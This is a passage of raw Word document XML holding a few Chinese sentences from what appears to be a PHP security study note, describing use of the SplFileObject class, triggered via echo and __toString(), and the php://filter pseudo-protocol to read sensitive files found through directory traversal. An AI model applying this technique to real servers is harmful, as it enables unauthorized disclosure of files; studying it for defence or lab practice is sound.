          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当用文件目录遍历到了敏感文件时，可以用SplFileObject类，同样通过echo触发SplFileObject中的__toString()方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2908300" cy="1350645"/>
            <wp:effectExtent l="0" t="0" r="0"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908300" cy="1350645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:eastAsia="宋体" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SplFileObject类以及联合伪协议进行读取。php://filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>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AE327"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="36DAE32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c1e41922-7154-4351-a528-943609bcb0ce"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="05A01219"/>
    <w:rsid w:val="08AC4379"/>
    <w:rsid w:val="0C006C9D"/>
    <w:rsid w:val="112278CE"/>
    <w:rsid w:val="12AF0CEE"/>
    <w:rsid w:val="1CF2453A"/>
    <w:rsid w:val="1E2F2684"/>
    <w:rsid w:val="1EB9616E"/>
    <w:rsid w:val="1ED507E3"/>
    <w:rsid w:val="21292558"/>
    <w:rsid w:val="217B175A"/>
    <w:rsid w:val="22067858"/>
    <w:rsid w:val="23CD455D"/>
    <w:rsid w:val="24F139C4"/>
    <w:rsid w:val="26267811"/>
    <w:rsid w:val="281C60E1"/>
    <w:rsid w:val="2CF0737E"/>
    <w:rsid w:val="2D6D1A79"/>
    <w:rsid w:val="2EFA10EB"/>
    <w:rsid w:val="348558FB"/>
    <w:rsid w:val="35270653"/>
    <w:rsid w:val="3A650377"/>
    <w:rsid w:val="3C0637C5"/>
    <w:rsid w:val="3CBB52F5"/>
    <w:rsid w:val="3F742380"/>
    <w:rsid w:val="41977142"/>
    <w:rsid w:val="43BB30E7"/>
    <w:rsid w:val="46EF03BD"/>
    <w:rsid w:val="497379DA"/>
    <w:rsid w:val="498A77E3"/>
    <w:rsid w:val="4A4A7755"/>
    <w:rsid w:val="4E127DA7"/>
    <w:rsid w:val="4EAD187E"/>
    <w:rsid w:val="51281690"/>
    <w:rsid w:val="513308E8"/>
    <w:rsid w:val="53DD49B3"/>
    <w:rsid w:val="54414F42"/>
    <w:rsid w:val="55DB467C"/>
    <w:rsid w:val="56900244"/>
    <w:rsid w:val="5838665C"/>
    <w:rsid w:val="5A133CA3"/>
    <w:rsid w:val="5B112A56"/>
    <w:rsid w:val="5B371B86"/>
    <w:rsid w:val="5B490B80"/>
    <w:rsid w:val="5F0C25F1"/>
    <w:rsid w:val="61734BA9"/>
    <w:rsid w:val="62C90F25"/>
    <w:rsid w:val="633F05F2"/>
    <w:rsid w:val="63C53A88"/>
    <w:rsid w:val="644A56CA"/>
    <w:rsid w:val="66A870A3"/>
    <w:rsid w:val="707318FB"/>
    <w:rsid w:val="7DA7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766</Words>
  <Characters>1568</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>12</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1624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2024-03-25T13:40:00Z</dcterms:created>
  <dc:creator>0629</dc:creator>
  <cp:lastModifiedBy>【】</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-29T07:38:31Z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9A318C927B1342028E09DB0B1C4BA509</vt:lpwstr>
  </property>
</Properties>
</file>